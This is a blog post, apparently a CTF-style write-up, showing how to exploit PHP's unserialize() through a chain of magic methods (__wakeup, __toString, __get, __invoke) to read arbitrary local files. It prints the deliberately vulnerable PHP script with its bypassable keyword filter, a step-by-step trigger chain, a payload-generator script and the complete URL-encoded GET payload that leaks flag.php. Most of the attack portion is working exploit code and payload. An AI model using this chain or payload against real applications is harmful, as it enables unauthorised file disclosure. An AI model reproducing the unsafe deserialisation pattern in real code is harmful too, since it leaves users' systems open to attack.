Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

Exploiting PHP Magic Methods to Read Arbitrary Files via Unserialize

Tech May 19 1 
<?php
error_reporting(1);

class Reader {
    public $file = 'index.php';
    public function fetch($path) {
        return base64_encode(file_get_contents($path));
    }
    public function __invoke() {
        echo $this->fetch($this->file);
    }
}

class Display {
    public $src;
    public $cfg;
    public function __construct($name = 'index.php') {
        $this->src = $name;
        echo $this->src . " loaded<br>";
    }
    public function __toString() {
        return $this->cfg['x']->src;
    }
    public function render() {
        if (preg_match('/gopher|http|ftp|https|dict|\.\.|flag|file/i', $this->src))
            die('blocked');
        highlight_file($this->src);
    }
    public function __wakeup() {
        if (preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this->src)) {
            echo "blocked";
            $this->src = 'index.php';
        }
    }
}

class Proxy {
    public $cb;
    public function __construct() {
        $this->cb = [];
    }
    public function __get($k) {
        $fn = $this->cb;
        return $fn();
    }
}

if (isset($_GET['payload'])) {
    unserialize($_GET['payload']);
} else {
    $d = new Display();
    $d->render();
}

Trigger Chain

  1. Display::__wakeup() is executed automatically after unserialize().
  2. Inside __wakeup() the preg_match() call forces $this->src too be treated as a string, invoking __toString() when $this->src is itself a Display object.
  3. __toString() dereferences $this->cfg['x']->src; if $this->cfg['x'] is a Proxy instance, the non-existing property src triggers Proxy::__get().
  4. __get() calls $this->cb(); if $this->cb is a Reader object, PHP invokes __invoke().
  5. __invoke() finally calls Reader::fetch() with the attacker-controlled $file, leaking any local file in base64.

Payload Generator

<?php
class Reader { public $file = 'flag.php'; }
class Display { public $src; public $cfg; }
class Proxy { public $cb; }

$d = new Display();
$d->src = $d;                // trigger __toString via preg_match
$d->cfg['x'] = new Proxy();
$d->cfg['x']->cb = new Reader();

echo urlencode(serialize($d));

The resulitng GET request:

/?payload=O%3A7%3A%22Display%22%3A2%3A%7Bs%3A3%3A%22src%22%3Br%3A1%3Bs%3A3%3A%22cfg%22%3Ba%3A1%3A%7Bs%3A1%3A%22x%22%3BO%3A5%3A%22Proxy%22%3A1%3A%7Bs%3A2%3A%22cb%22%3BO%3A6%3A%22Reader%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D%7D

The base64-encoded content of flag.php is printed to the browser.

Tags: PHPunserializepop-chainmagic-methods
Back to List

Prev: LCMV Adaptive Beamforming: Simulation and Performance Analysis

Next: Implementing Memory Caching and Performance Optimization for Android ListViews

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

SBUS Signal Analysis and Communication Implementation Using STM32 with Fus Remote Controller

Overview In a recent project, I utilized the SBUS protocol with the Fus remote controller to control a vehicle's basic operations, including movement, lights, and mode switching. This article is aimed...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top